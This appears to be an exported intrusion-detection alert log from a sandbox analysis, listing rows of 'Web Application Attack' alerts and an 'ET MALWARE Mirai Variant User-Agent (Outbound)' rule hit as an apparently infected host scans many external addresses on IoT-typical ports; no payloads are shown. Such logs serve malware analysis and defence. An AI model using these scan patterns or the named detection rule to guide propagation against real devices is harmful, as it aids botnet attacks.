2024-11-28T07:28:21.572726+0100	2030092	1	Web Application Attack	192.168.2.23	48936	200.60.162.40	80	TCP
2024-11-28T07:28:21.573119+0100	2030092	1	Web Application Attack	192.168.2.23	45202	175.127.32.99	80	TCP
2024-11-28T07:28:21.578631+0100	2030092	1	Web Application Attack	192.168.2.23	60758	50.82.114.48	80	TCP
2024-11-28T07:28:21.582028+0100	2030092	1	Web Application Attack	192.168.2.23	46756	220.213.171.152	80	TCP
2024-11-28T07:28:21.588720+0100	2030092	1	Web Application Attack	192.168.2.23	45058	222.71.55.197	80	TCP
2024-11-28T07:28:21.613042+0100	2030092	1	Web Application Attack	192.168.2.23	46276	26.133.106.54	80	TCP
2024-11-28T07:28:33.537804+0100	2030092	1	Web Application Attack	192.168.2.23	57110	204.181.118.146	80	TCP
2024-11-28T07:28:33.597471+0100	2030092	1	Web Application Attack	192.168.2.23	32980	174.184.127.44	80	TCP
2024-11-28T07:28:35.605438+0100	2030092	1	Web Application Attack	192.168.2.23	53522	28.38.73.153	80	TCP
2024-11-28T07:28:39.503692+0100	2030092	1	Web Application Attack	192.168.2.23	44322	114.50.104.12	80	TCP
2024-11-28T07:28:39.598905+0100	2030092	1	Web Application Attack	192.168.2.23	39790	12.48.123.87	80	TCP
2024-11-28T07:28:40.563951+0100	2030092	1	Web Application Attack	192.168.2.23	33470	159.88.243.196	80	TCP
2024-11-28T07:28:40.598256+0100	2030092	1	Web Application Attack	192.168.2.23	56796	49.54.129.20	80	TCP
2024-11-28T07:28:40.600107+0100	2030092	1	Web Application Attack	192.168.2.23	43992	80.42.12.79	80	TCP
2024-11-28T07:28:40.607089+0100	2030092	1	Web Application Attack	192.168.2.23	43542	119.201.115.104	80	TCP
2024-11-28T07:28:40.607461+0100	2030092	1	Web Application Attack	192.168.2.23	49990	108.121.86.213	80	TCP
2024-11-28T07:28:40.607833+0100	2030092	1	Web Application Attack	192.168.2.23	49576	193.59.63.137	80	TCP
2024-11-28T07:28:42.566867+0100	2030092	1	Web Application Attack	192.168.2.23	50214	135.175.75.166	80	TCP
2024-11-28T07:28:42.597078+0100	2030092	1	Web Application Attack	192.168.2.23	53568	102.14.30.69	80	TCP
2024-11-28T07:28:43.514040+0100	2030092	1	Web Application Attack	192.168.2.23	40262	188.234.2.182	80	TCP
2024-11-28T07:28:43.519120+0100	2030092	1	Web Application Attack	192.168.2.23	43444	74.23.91.76	80	TCP
2024-11-28T07:28:43.537243+0100	2030092	1	Web Application Attack	192.168.2.23	55988	126.211.100.65	80	TCP
2024-11-28T07:28:44.527247+0100	2030092	1	Web Application Attack	192.168.2.23	49716	8.175.157.126	80	TCP
2024-11-28T07:28:47.573135+0100	2030092	1	Web Application Attack	192.168.2.23	41040	156.26.16.136	80	TCP
2024-11-28T07:28:47.592450+0100	2030092	1	Web Application Attack	192.168.2.23	33724	198.217.213.38	80	TCP
2024-11-28T07:28:47.593913+0100	2030092	1	Web Application Attack	192.168.2.23	51016	22.97.50.105	80	TCP
2024-11-28T07:28:49.587290+0100	2030092	1	Web Application Attack	192.168.2.23	35836	220.208.144.34	80	TCP
2024-11-28T07:28:50.593006+0100	2030092	1	Web Application Attack	192.168.2.23	43188	140.43.141.189	80	TCP
2024-11-28T07:28:51.561027+0100	2030092	1	Web Application Attack	192.168.2.23	34172	157.246.210.71	80	TCP
2024-11-28T07:28:51.601624+0100	2030092	1	Web Application Attack	192.168.2.23	37260	39.5.42.35	80	TCP
2024-11-28T07:28:52.518329+0100	2030092	1	Web Application Attack	192.168.2.23	44932	170.86.222.194	80	TCP
2024-11-28T07:28:52.586761+0100	2030092	1	Web Application Attack	192.168.2.23	58350	159.209.117.216	80	TCP
2024-11-28T07:28:54.559757+0100	2030092	1	Web Application Attack	192.168.2.23	58140	143.80.92.37	80	TCP
2024-11-28T07:28:55.505373+0100	2030092	1	Web Application Attack	192.168.2.23	47254	170.189.236.39	80	TCP
2024-11-28T07:28:55.577093+0100	2030092	1	Web Application Attack	192.168.2.23	59866	211.138.21.19	80	TCP
2024-11-28T07:28:55.598049+0100	2030092	1	Web Application Attack	192.168.2.23	54764	29.239.31.161	80	TCP
2024-11-28T07:28:56.523677+0100	2030092	1	Web Application Attack	192.168.2.23	44954	31.231.192.61	80	TCP
2024-11-28T07:28:56.598148+0100	2030092	1	Web Application Attack	192.168.2.23	41222	176.37.130.5	80	TCP
2024-11-28T07:29:00.555685+0100	2030092	1	Web Application Attack	192.168.2.23	37988	120.175.236.38	80	TCP
2024-11-28T07:29:02.530841+0100	2030092	1	Web Application Attack	192.168.2.23	52754	176.1.96.117	80	TCP
2024-11-28T07:29:02.589368+0100	2030092	1	Web Application Attack	192.168.2.23	41182	106.218.209.57	80	TCP
2024-11-28T07:29:03.555686+0100	2030092	1	Web Application Attack	192.168.2.23	46966	200.6.145.229	80	TCP
2024-11-28T07:29:03.582490+0100	2030092	1	Web Application Attack	192.168.2.23	54824	2.199.234.248	80	TCP
2024-11-28T07:29:04.565729+0100	2030092	1	Web Application Attack	192.168.2.23	57798	118.35.71.138	80	TCP
2024-11-28T07:29:04.581845+0100	2030092	1	Web Application Attack	192.168.2.23	57404	164.216.166.24	80	TCP
2024-11-28T07:29:05.601854+0100	2030092	1	Web Application Attack	192.168.2.23	42642	1.96.199.125	80	TCP
2024-11-28T07:29:07.501702+0100	2030092	1	Web Application Attack	192.168.2.23	39196	109.43.118.110	80	TCP
2024-11-28T07:29:07.524983+0100	2030092	1	Web Application Attack	192.168.2.23	38390	189.55.0.254	80	TCP
2024-11-28T07:29:07.599357+0100	2030092	1	Web Application Attack	192.168.2.23	43502	33.236.32.144	80	TCP
2024-11-28T07:29:07.604497+0100	2030092	1	Web Application Attack	192.168.2.23	54832	101.251.159.167	80	TCP
2024-11-28T07:29:08.550980+0100	2030092	1	Web Application Attack	192.168.2.23	37214	188.5.181.41	80	TCP
2024-11-28T07:29:08.551392+0100	2030092	1	Web Application Attack	192.168.2.23	42422	102.116.67.9	80	TCP
2024-11-28T07:29:11.512245+0100	2030092	1	Web Application Attack	192.168.2.23	56972	67.28.77.205	80	TCP
2024-11-28T07:29:11.543468+0100	2030092	1	Web Application Attack	192.168.2.23	36218	52.95.18.143	80	TCP
2024-11-28T07:29:14.603650+0100	2030092	1	Web Application Attack	192.168.2.23	36944	48.235.98.93	80	TCP
2024-11-28T07:29:15.503515+0100	2030092	1	Web Application Attack	192.168.2.23	57530	175.166.167.208	80	TCP
2024-11-28T07:29:15.553852+0100	2030092	1	Web Application Attack	192.168.2.23	41082	152.141.41.153	80	TCP

ET MALWARE Mirai Variant User-Agent (Outbound)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T07:28:00.977945+0100	2029034	1	Web Application Attack	192.168.2.23	45422	158.228.53.169	7574	TCP
2024-11-28T07:28:01.057863+0100	2029034	1	Web Application Attack	192.168.2.23	58364	108.165.239.251	8080	TCP
2024-11-28T07:28:01.309854+0100	2029034	1	Web Application Attack	192.168.2.23	38690	177.200.207.58	80	TCP
2024-11-28T07:28:01.461820+0100	2029034	1	Web Application Attack	192.168.2.23	57246	119.215.99.156	5555	TCP
2024-11-28T07:28:09.507681+0100	2029034	1	Web Application Attack	192.168.2.23	52624	52.116.215.210	80	TCP
2024-11-28T07:28:09.510326+0100	2029034	1	Web Application Attack	192.168.2.23	40018	175.170.71.155	49152	TCP
2024-11-28T07:28:09.510606+0100	2029034	1	Web Application Attack	192.168.2.23	44862	214.89.56.229	80	TCP
2024-11-28T07:28:09.512442+0100	2029034	1	Web Application Attack	192.168.2.23	52432	159.99.163.111	7574	TCP
2024-11-28T07:28:09.513175+0100	2029034	1	Web Application Attack	192.168.2.23	34066	64.173.83.170	5555	TCP
2024-11-28T07:28:09.513546+0100	2029034	1	Web Application Attack	192.168.2.23	56088	186.96.78.186	49152	TCP
2024-11-28T07:28:09.514267+0100	2029034	1	Web Application Attack	192.168.2.23	59688	166.249.145.160	5555	TCP
2024-11-28T07:28:09.515001+0100	2029034	1	Web Application Attack	192.168.2.23	34086	75.89.77.206	80	TCP
2024-11-28T07:28:09.515372+0100	2029034	1	Web Application Attack	192.168.2.23	50660	114.117.212.4	49152	TCP
2024-11-28T07:28:09.515733+0100	2029034	1	Web Application Attack	192.168.2.23	48846	114.17.69.181	5555	TCP
2024-11-28T07:28:09.516815+0100	2029034	1	Web Application Attack	192.168.2.23	55030	35.184.146.118	49152	TCP
2024-11-28T07:28:09.517185+0100	2029034	1	Web Application Attack	192.168.2.23	32980	122.187.139.190	80	TCP
2024-11-28T07:28:09.517913+0100	2029034	1	Web Application Attack	192.168.2.23	49366	177.120.79.8	80	TCP
2024-11-28T07:28:09.518651+0100	2029034	1	Web Application Attack	192.168.2.23	44448	203.238.209.21	5555	TCP
2024-11-28T07:28:09.519020+0100	2029034	1	Web Application Attack	192.168.2.23	52900	143.207.148.54	49152	TCP
2024-11-28T07:28:09.521249+0100	2029034	1	Web Application Attack	192.168.2.23	52188	117.244.40.134	80	TCP
2024-11-28T07:28:09.521646+0100	2029034	1	Web Application Attack	192.168.2.23	48626	107.201.204.124	49152	TCP
2024-11-28T07:28:09.522399+0100	2029034	1	Web Application Attack	192.168.2.23	58462	170.20.179.231	8080	TCP
2024-11-28T07:28:09.523891+0100	2029034	1	Web Application Attack	192.168.2.23	45596	158.60.86.218	7574	TCP
2024-11-28T07:28:09.524270+0100	2029034	1	Web Application Attack	192.168.2.23	43880	191.213.172.77	7574	TCP
2024-11-28T07:28:09.526156+0100	2029034	1	Web Application Attack	192.168.2.23	39428	163.197.220.203	49152	TCP
2024-11-28T07:28:09.526519+0100	2029034	1	Web Application Attack	192.168.2.23	48312	38.198.165.69	7574	TCP
2024-11-28T07:28:09.526898+0100	2029034	1	Web Application Attack	192.168.2.23	60608	28.115.34.207	80	TCP
2024-11-28T07:28:09.528801+0100	2029034	1	Web Application Attack	192.168.2.23	40154	99.216.95.166	5555	TCP
2024-11-28T07:28:09.531008+0100	2029034	1	Web Application Attack	192.168.2.23	46784	97.137.41.211	80	TCP
2024-11-28T07:28:09.531385+0100	2029034	1	Web Application Attack	192.168.2.23	45114	171.119.20.118	49152	TCP
2024-11-28T07:28:09.531740+0100	2029034	1	Web Application Attack	192.168.2.23	59424	36.64.74.203	49152	TCP
2024-11-28T07:28:09.532122+0100	2029034	1	Web Application Attack	192.168.2.23	46996	136.27.141.23	8080	TCP
2024-11-28T07:28:09.532518+0100	2029034	1	Web Application Attack	192.168.2.23	57430	109.90.191.175	8080	TCP
2024-11-28T07:28:09.534036+0100	2029034	1	Web Application Attack	192.168.2.23	57024	24.158.93.235	8080	TCP
2024-11-28T07:28:09.534786+0100	2029034	1	Web Application Attack	192.168.2.23	46042	193.206.30.210	8080	TCP
2024-11-28T07:28:09.535554+0100	2029034	1	Web Application Attack	192.168.2.23	59610	103.210.62.103	80	TCP
2024-11-28T07:28:09.536317+0100	2029034	1	Web Application Attack	192.168.2.23	45072	209.161.87.32	8080	TCP
2024-11-28T07:28:09.537078+0100	2029034	1	Web Application Attack	192.168.2.23	50212	68.10.114.24	80	TCP
2024-11-28T07:28:09.537833+0100	2029034	1	Web Application Attack	192.168.2.23	37414	44.153.13.5	80	TCP
2024-11-28T07:28:09.538212+0100	2029034	1	Web Application Attack	192.168.2.23	60776	15.182.172.18	5555	TCP
2024-11-28T07:28:09.538595+0100	2029034	1	Web Application Attack	192.168.2.23	46444	55.164.19.178	80	TCP
2024-11-28T07:28:09.539011+0100	2029034	1	Web Application Attack	192.168.2.23	49042	142.0.210.253	8080	TCP
2024-11-28T07:28:09.539729+0100	2029034	1	Web Application Attack	192.168.2.23	54768	76.160.156.242	80	TCP
2024-11-28T07:28:09.540491+0100	2029034	1	Web Application Attack	192.168.2.23	46302	187.46.100.111	80	TCP
2024-11-28T07:28:09.542791+0100	2029034	1	Web Application Attack	192.168.2.23	38284	203.108.157.203	49152	TCP
2024-11-28T07:28:09.543332+0100	2029034	1	Web Application Attack	192.168.2.23	54284	97.116.126.171	7574	TCP
2024-11-28T07:28:09.543964+0100	2029034	1	Web Application Attack	192.168.2.23	44394	152.145.133.63	7574	TCP
2024-11-28T07:28:09.544384+0100	2029034	1	Web Application Attack	192.168.2.23	54816	167.138.9.251	80	TCP
2024-11-28T07:28:09.545445+0100	2029034	1	Web Application Attack	192.168.2.23	54464	40.134.41.147	80	TCP
2024-11-28T07:28:09.546572+0100	2029034	1	Web Application Attack	192.168.2.23	50630	205.138.223.89	5555	TCP
2024-11-28T07:28:09.547321+0100	2029034	1	Web Application Attack	192.168.2.23	49770	178.81.166.199	5555	TCP
2024-11-28T07:28:09.547928+0100	2029034	1	Web Application Attack	192.168.2.23	53618	9.27.194.149	8080	TCP
2024-11-28T07:28:09.548458+0100	2029034	1	Web Application Attack	192.168.2.23	37136	197.96.116.135	80	TCP
2024-11-28T07:28:09.549912+0100	2029034	1	Web Application Attack	192.168.2.23	45848	131.57.28.181	8080	TCP
2024-11-28T07:28:09.550269+0100	2029034	1	Web Application Attack	192.168.2.23	58860	95.213.81.21	80	TCP
2024-11-28T07:28:09.551360+0100	2029034	1	Web Application Attack	192.168.2.23	44056	221.66.59.135	7574	TCP
2024-11-28T07:28:09.553545+0100	2029034	1	Web Application Attack	192.168.2.23	41324	142.172.142.87	49152	TCP
2024-11-28T07:28:09.554334+0100	2029034	1	Web Application Attack	192.168.2.23	45222	11.190.108.117	80	TCP
2024-11-28T07:28:09.554696+0100	2029034	1	Web Application Attack	192.168.2.23	38934	140.221.39.242	80	TCP
2024-11-28T07:28:09.555814+0100	2029034	1	Web Application Attack	192.168.2.23	33862	113.94.133.170	7574	TCP
2024-11-28T07:28:09.556589+0100	2029034	1	Web Application Attack	192.168.2.23	42656	26.11.196.70	5555	TCP
2024-11-28T07:28:09.557706+0100	2029034	1	Web Application Attack	192.168.2.23	37290	35.200.178.13	5555	TCP
2024-11-28T07:28:09.559213+0100	2029034	1	Web Application Attack	192.168.2.23	53152	32.54.226.30	7574	TCP
2024-11-28T07:28:09.559992+0100	2029034	1	Web Application Attack	192.168.2.23	46644	7.29.11.132	5555	TCP
2024-11-28T07:28:09.561071+0100	2029034	1	Web Application Attack	192.168.2.23	56786	55.77.110.137	7574	TCP
2024-11-28T07:28:09.561447+0100	2029034	1	Web Application Attack	192.168.2.23	34262	30.84.48.130	80	TCP
2024-11-28T07:28:09.561814+0100	2029034	1	Web Application Attack	192.168.2.23	49462	171.23.177.240	49152	TCP
2024-11-28T07:28:09.562622+0100	2029034	1	Web Application Attack	192.168.2.23	42460	96.204.93.246	5555	TCP
2024-11-28T07:28:09.562937+0100	2029034	1	Web Application Attack	192.168.2.23	34158	6.205.85.158	49152	TCP
2024-11-28T07:28:09.563305+0100	2029034	1	Web Application Attack	192.168.2.23	55714	122.248.149.165	80	TCP
2024-11-28T07:28:09.563673+0100	2029034	1	Web Application Attack	192.168.2.23	33160	192.97.26.236	80	TCP
2024-11-28T07:28:09.564781+0100	2029034	1	Web Application Attack	192.168.2.23	34592	25.75.205.173	5555	TCP
2024-11-28T07:28:09.566688+0100	2029034	1	Web Application Attack	192.168.2.23	45012	137.62.189.193	80	TCP
2024-11-28T07:28:09.566819+0100	2029034	1	Web Application Attack	192.168.2.23	56816	107.227.55.144	80	TCP
2024-11-28T07:28:09.567069+0100	2029034	1	Web Application Attack	192.168.2.23	41512	209.219.134.7	7574	TCP
2024-11-28T07:28:09.567821+0100	2029034	1	Web Application Attack	192.168.2.23	48810	59.230.90.160	5555	TCP
2024-11-28T07:28:09.568190+0100	2029034	1	Web Application Attack	192.168.2.23	50024	179.251.32.251	80	TCP
2024-11-28T07:28:09.568935+0100	2029034	1	Web Application Attack	192.168.2.23	60514	158.166.4.165	80	TCP
2024-11-28T07:28:09.568935+0100	2029034	1	Web Application Attack	192.168.2.23	53088	68.228.150.77	8080	TCP
2024-11-28T07:28:09.569310+0100	2029034	1	Web Application Attack	192.168.2.23	49262	55.92.215.83	80	TCP
2024-11-28T07:28:09.570433+0100	2029034	1	Web Application Attack	192.168.2.23	54916	167.15.35.246	7574	TCP
2024-11-28T07:28:09.570809+0100	2029034	1	Web Application Attack	192.168.2.23	52194	134.224.138.24	7574	TCP
2024-11-28T07:28:09.571330+0100	2029034	1	Web Application Attack	192.168.2.23	40736	31.23.54.208	7574	TCP
2024-11-28T07:28:09.571564+0100	2029034	1	Web Application Attack	192.168.2.23	54474	170.93.179.178	7574	TCP
2024-11-28T07:28:09.571928+0100	2029034	1	Web Application Attack	192.168.2.23	39080	196.155.214.59	5555	TCP
2024-11-28T07:28:09.573168+0100	2029034	1	Web Application Attack	192.168.2.23	43916	105.45.143.155	80	TCP
2024-11-28T07:28:09.574185+0100	2029034	1	Web Application Attack	192.168.2.23	49334	75.31.109.126	7574	TCP
2024-11-28T07:28:09.574563+0100	2029034	1	Web Application Attack	192.168.2.23	51128	170.251.163.52	5555	TCP
2024-11-28T07:28:09.574945+0100	2029034	1	Web Application Attack	192.168.2.23	36546	217.237.6.188	80	TCP
2024-11-28T07:28:09.575321+0100	2029034	1	Web Application Attack	192.168.2.23	35764	9.31.4.141	8080	TCP
2024-11-28T07:28:09.576047+0100	2029034	1	Web Application Attack	192.168.2.23	41996	161.154.233.90	80	TCP
2024-11-28T07:28:09.579008+0100	2029034	1	Web Application Attack	192.168.2.23	54360	220.234.56.30	49152	TCP
2024-11-28T07:28:09.579037+0100	2029034	1	Web Application Attack	192.168.2.23	53006	180.158.189.190	80	TCP
2024-11-28T07:28:09.579841+0100	2029034	1	Web Application Attack	192.168.2.23	36598	152.206.32.137	8080	TCP
2024-11-28T07:28:09.583788+0100	2029034	1	Web Application Attack	192.168.2.23	50966	202.214.164.77	49152	TCP
2024-11-28T07:28:09.584890+0100	2029034	1	Web Application Attack	192.168.2.23	44616	222.239.189.68	5555	TCP
2024-11-28T07:28:09.585617+0100	2029034	1	Web Application Attack	192.168.2.23	56402	45.49.121.237	7574	TCP
2024-11-28T07:28:09.585985+0100	2029034	1	Web Application Attack	192.168.2.23	49388	157.116.73.7	7574	TCP
2024-11-28T07:28:09.586715+0100	2029034	1	Web Application Attack	192.168.2.23	38626	137.6.145.87	5555	TCP
2024-11-28T07:28:09.588914+0100	2029034	1	Web Application Attack	192.168.2.23	51976	28.36.92.242	80	TCP
2024-11-28T07:28:09.588947+0100	2029034	1	Web Application Attack	192.168.2.23	59794	45.90.89.27	7574	TCP
2024-11-28T07:28:09.590266+0100	2029034	1	Web Application Attack	192.168.2.23	57590	118.79.188.67	80	TCP
2024-11-28T07:28:09.590387+0100	2029034	1	Web Application Attack	192.168.2.23	34178	15.238.152.127	80	TCP
2024-11-28T07:28:09.591110+0100	2029034	1	Web Application Attack	192.168.2.23	55294	99.219.59.203	49152	TCP
2024-11-28T07:28:09.591336+0100	2029034	1	Web Application Attack	192.168.2.23	54792	114.177.103.150	7574	TCP
2024-11-28T07:28:09.591481+0100	2029034	1	Web Application Attack	192.168.2.23	49030	9.179.110.111	8080	TCP
2024-11-28T07:28:09.592209+0100	2029034	1	Web Application Attack	192.168.2.23	60714	207.79.150.234	5555	TCP
2024-11-28T07:28:09.594395+0100	2029034	1	Web Application Attack	192.168.2.23	52560	153.118.180.181	49152	TCP
2024-11-28T07:28:09.594765+0100	2029034	1	Web Application Attack	192.168.2.23	44238	197.179.152.198	7574	TCP
2024-11-28T07:28:09.595857+0100	2029034	1	Web Application Attack	192.168.2.23	40020	173.220.217.199	5555	TCP
2024-11-28T07:28:09.596002+0100	2029034	1	Web Application Attack	192.168.2.23	48870	129.46.212.84	80	TCP
2024-11-28T07:28:09.599553+0100	2029034	1	Web Application Attack	192.168.2.23	44322	54.197.126.116	49152	TCP
2024-11-28T07:28:09.600971+0100	2029034	1	Web Application Attack	192.168.2.23	52506	170.254.161.26	49152	TCP
2024-11-28T07:28:09.602149+0100	2029034	1	Web Application Attack	192.168.2.23	48112	108.29.185.40	7574	TCP
2024-11-28T07:28:09.602803+0100	2029034	1	Web Application Attack	192.168.2.23	42750	114.220.234.17	7574	TCP
2024-11-28T07:28:09.603205+0100	2029034	1	Web Application Attack	192.168.2.23	36116	3.195.8.90	7574	TCP
2024-11-28T07:28:09.603928+0100	2029034	1	Web Application Attack	192.168.2.23	46988	157.96.102.17	80	TCP
2024-11-28T07:28:09.605760+0100	2029034	1	Web Application Attack	192.168.2.23	50950	58.130.138.131	80	TCP
2024-11-28T07:28:09.606481+0100	2029034	1	Web Application Attack	192.168.2.23	51822	120.121.182.155	8080	TCP
2024-11-28T07:28:09.607698+0100	2029034	1	Web Application Attack	192.168.2.23	46204	153.97.17.195	8080	TCP
2024-11-28T07:28:09.608090+0100	2029034	1	Web Application Attack	192.168.2.23	48570	123.86.59.14	49152	TCP
2024-11-28T07:28:09.609169+0100	2029034	1	Web Application Attack	192.168.2.23	40158	74.42.253.221	49152	TCP
2024-11-28T07:28:09.611072+0100	2029034	1	Web Application Attack	192.168.2.23	48726	191.33.92.105	5555	TCP
2024-11-28T07:28:09.612885+0100	2029034	1	Web Application Attack	192.168.2.23	49652	50.196.185.72	80	TCP
2024-11-28T07:28:09.614715+0100	2029034	1	Web Application Attack	192.168.2.23	55508	184.76.229.89	7574	TCP
2024-11-28T07:28:09.615080+0100	2029034	1	Web Application Attack	192.168.2.23	59782	2.144.168.159	49152	TCP
2024-11-28T07:28:09.615817+0100	2029034	1	Web Application Attack	192.168.2.23	58492	81.241.101.2	8080	TCP
2024-11-28T07:28:12.796431+0100	2029034	1	Web Application Attack	192.168.2.23	49106	190.16.155.107	5555	TCP
2024-11-28T07:28:12.796445+0100	2029034	1	Web Application Attack	192.168.2.23	45316	187.38.102.206	49152	TCP
2024-11-28T07:28:13.340343+0100	2029034	1	Web Application Attack	192.168.2.23	53954	202.178.119.161	80	TCP
2024-11-28T07:28:13.515361+0100	2029034	1	Web Application Attack	192.168.2.23	39418	200.13.149.223	80	TCP
2024-11-28T07:28:13.529270+0100	2029034	1	Web Application Attack	192.168.2.23	42400	102.193.207.146	8080	TCP
2024-11-28T07:28:21.505635+0100	2029034	1	Web Application Attack	192.168.2.23	53778	141.244.188.12	49152	TCP
2024-11-28T07:28:21.507096+0100	2029034	1	Web Application Attack	192.168.2.23	54604	95.159.40.251	7574	TCP
2024-11-28T07:28:21.507480+0100	2029034	1	Web Application Attack	192.168.2.23	60844	53.174.185.180	5555	TCP
2024-11-28T07:28:21.508943+0100	2029034	1	Web Application Attack	192.168.2.23	42354	9.56.220.231	49152	TCP
2024-11-28T07:28:21.509313+0100	2029034	1	Web Application Attack	192.168.2.23	40806	110.44.0.102	5555	TCP
2024-11-28T07:28:21.510050+0100	2029034	1	Web Application Attack	192.168.2.23	35144	90.72.116.28	7574	TCP
2024-11-28T07:28:21.510419+0100	2029034	1	Web Application Attack	192.168.2.23	40192	146.25.213.174	49152	TCP
2024-11-28T07:28:21.510786+0100	2029034	1	Web Application Attack	192.168.2.23	44986	191.45.226.73	8080	TCP
2024-11-28T07:28:21.511154+0100	2029034	1	Web Application Attack	192.168.2.23	54634	155.64.195.25	7574	TCP
2024-11-28T07:28:21.511519+0100	2029034	1	Web Application Attack	192.168.2.23	39868	209.78.212.21	8080	TCP
2024-11-28T07:28:21.511922+0100	2029034	1	Web Application Attack	192.168.2.23	56232	86.252.168.14	80	TCP
2024-11-28T07:28:21.513739+0100	2029034	1	Web Application Attack	192.168.2.23	36014	133.133.78.165	80	TCP
2024-11-28T07:28:21.514838+0100	2029034	1	Web Application Attack	192.168.2.23	52390	201.188.175.229	7574	TCP
2024-11-28T07:28:21.515221+0100	2029034	1	Web Application Attack	192.168.2.23	43430	164.167.9.70	80	TCP
2024-11-28T07:28:21.515574+0100	2029034	1	Web Application Attack	192.168.2.23	60010	173.66.249.230	7574	TCP
2024-11-28T07:28:21.516313+0100	2029034	1	Web Application Attack	192.168.2.23	41060	105.175.75.134	5555	TCP
2024-11-28T07:28:21.517057+0100	2029034	1	Web Application Attack	192.168.2.23	56158	166.105.236.182	7574	TCP
2024-11-28T07:28:21.517778+0100	2029034	1	Web Application Attack	192.168.2.23	34918	25.125.5.55	49152	TCP
2024-11-28T07:28:21.518872+0100	2029034	1	Web Application Attack	192.168.2.23	55158	83.172.215.118	5555	TCP
2024-11-28T07:28:21.519977+0100	2029034	1	Web Application Attack	192.168.2.23	50116	80.12.206.237	7574	TCP
2024-11-28T07:28:21.520709+0100	2029034	1	Web Application Attack	192.168.2.23	58726	2.243.56.199	80	TCP
2024-11-28T07:28:21.521442+0100	2029034	1	Web Application Attack	192.168.2.23	51316	215.40.71.26	8080	TCP
2024-11-28T07:28:21.521811+0100	2029034	1	Web Application Attack	192.168.2.23	55336	130.67.243.6	8080	TCP
2024-11-28T07:28:21.522182+0100	2029034	1	Web Application Attack	192.168.2.23	60376	79.254.93.26	49152	TCP
2024-11-28T07:28:21.523657+0100	2029034	1	Web Application Attack	192.168.2.23	48998	182.151.249.38	80	TCP
2024-11-28T07:28:21.524392+0100	2029034	1	Web Application Attack	192.168.2.23	35580	47.234.28.192	5555	TCP
2024-11-28T07:28:21.527084+0100	2029034	1	Web Application Attack	192.168.2.23	39552	84.5.28.114	7574	TCP
2024-11-28T07:28:21.528861+0100	2029034	1	Web Application Attack	192.168.2.23	47010	128.160.247.151	49152	TCP
2024-11-28T07:28:21.529223+0100	2029034	1	Web Application Attack	192.168.2.23	58060	148.76.110.167	80	TCP
2024-11-28T07:28:21.529953+0100	2029034	1	Web Application Attack	192.168.2.23	57650	156.166.198.160	8080	TCP
2024-11-28T07:28:21.530325+0100	2029034	1	Web Application Attack	192.168.2.23	51176	199.201.191.100	49152	TCP
2024-11-28T07:28:21.530684+0100	2029034	1	Web Application Attack	192.168.2.23	60216	87.41.98.96	80	TCP
2024-11-28T07:28:21.531786+0100	2029034	1	Web Application Attack	192.168.2.23	35580	68.79.128.122	7574	TCP
2024-11-28T07:28:21.532159+0100	2029034	1	Web Application Attack	192.168.2.23	32862	218.240.42.107	8080	TCP
2024-11-28T07:28:21.532539+0100	2029034	1	Web Application Attack	192.168.2.23	57606	53.189.162.142	80	TCP
2024-11-28T07:28:21.533256+0100	2029034	1	Web Application Attack	192.168.2.23	36814	100.12.64.164	49152	TCP
2024-11-28T07:28:21.533621+0100	2029034	1	Web Application Attack	192.168.2.23	43140	97.121.163.0	7574	TCP
2024-11-28T07:28:21.533982+0100	2029034	1	Web Application Attack	192.168.2.23	57598	75.158.5.139	8080	TCP
2024-11-28T07:28:21.534348+0100	2029034	1	Web Application Attack	192.168.2.23	37466	14.55.151.40	80	TCP
2024-11-28T07:28:21.535806+0100	2029034	1	Web Application Attack	192.168.2.23	51534	18.236.8.199	7574	TCP
2024-11-28T07:28:21.537258+0100	2029034	1	Web Application Attack	192.168.2.23	33380	176.126.172.174	80	TCP
2024-11-28T07:28:21.539500+0100	2029034	1	Web Application Attack	192.168.2.23	41766	48.128.115.213	49152	TCP
2024-11-28T07:28:21.540611+0100	2029034	1	Web Application Attack	192.168.2.23	52716	22.32.12.201	80	TCP
2024-11-28T07:28:21.540971+0100	2029034	1	Web Application Attack	192.168.2.23	55162	15.113.25.131	7574	TCP
2024-11-28T07:28:21.542092+0100	2029034	1	Web Application Attack	192.168.2.23	44994	77.47.103.213	5555	TCP
2024-11-28T07:28:21.542832+0100	2029034	1	Web Application Attack	192.168.2.23	33348	71.241.194.217	80	TCP
2024-11-28T07:28:21.543203+0100	2029034	1	Web Application Attack	192.168.2.23	45914	99.57.40.174	8080	TCP
2024-11-28T07:28:21.543947+0100	2029034	1	Web Application Attack	192.168.2.23	37600	20.191.233.24	80	TCP
2024-11-28T07:28:21.545424+0100	2029034	1	Web Application Attack	192.168.2.23	41548	66.141.72.196	7574	TCP
2024-11-28T07:28:21.545796+0100	2029034	1	Web Application Attack	192.168.2.23	55898	19.97.225.232	8080	TCP
2024-11-28T07:28:21.546184+0100	2029034	1	Web Application Attack	192.168.2.23	34870	11.3.1.179	80	TCP
2024-11-28T07:28:21.546541+0100	2029034	1	Web Application Attack	192.168.2.23	36954	94.134.209.196	80	TCP
2024-11-28T07:28:21.548056+0100	2029034	1	Web Application Attack	192.168.2.23	33322	152.225.48.236	5555	TCP
2024-11-28T07:28:21.548453+0100	2029034	1	Web Application Attack	192.168.2.23	53048	16.34.243.125	80	TCP
2024-11-28T07:28:21.548816+0100	2029034	1	Web Application Attack	192.168.2.23	49124	63.216.152.237	80	TCP
2024-11-28T07:28:21.549588+0100	2029034	1	Web Application Attack	192.168.2.23	34650	14.206.36.67	80	TCP
2024-11-28T07:28:21.549948+0100	2029034	1	Web Application Attack	192.168.2.23	41894	121.122.226.155	80	TCP
2024-11-28T07:28:21.550333+0100	2029034	1	Web Application Attack	192.168.2.23	54842	109.73.44.115	80	TCP
2024-11-28T07:28:21.550787+0100	2029034	1	Web Application Attack	192.168.2.23	46566	110.53.18.20	5555	TCP
2024-11-28T07:28:21.551990+0100	2029034	1	Web Application Attack	192.168.2.23	53140	94.210.13.65	7574	TCP
2024-11-28T07:28:21.553676+0100	2029034	1	Web Application Attack	192.168.2.23	53776	196.163.229.29	80	TCP
2024-11-28T07:28:21.554783+0100	2029034	1	Web Application Attack	192.168.2.23	43296	221.219.229.131	49152	TCP
2024-11-28T07:28:21.555548+0100	2029034	1	Web Application Attack	192.168.2.23	52534	16.156.233.47	80	TCP
2024-11-28T07:28:21.555919+0100	2029034	1	Web Application Attack	192.168.2.23	33188	211.75.126.69	49152	TCP
2024-11-28T07:28:21.559686+0100	2029034	1	Web Application Attack	192.168.2.23	56276	58.13.152.91	8080	TCP
2024-11-28T07:28:21.560825+0100	2029034	1	Web Application Attack	192.168.2.23	34448	108.32.60.179	8080	TCP
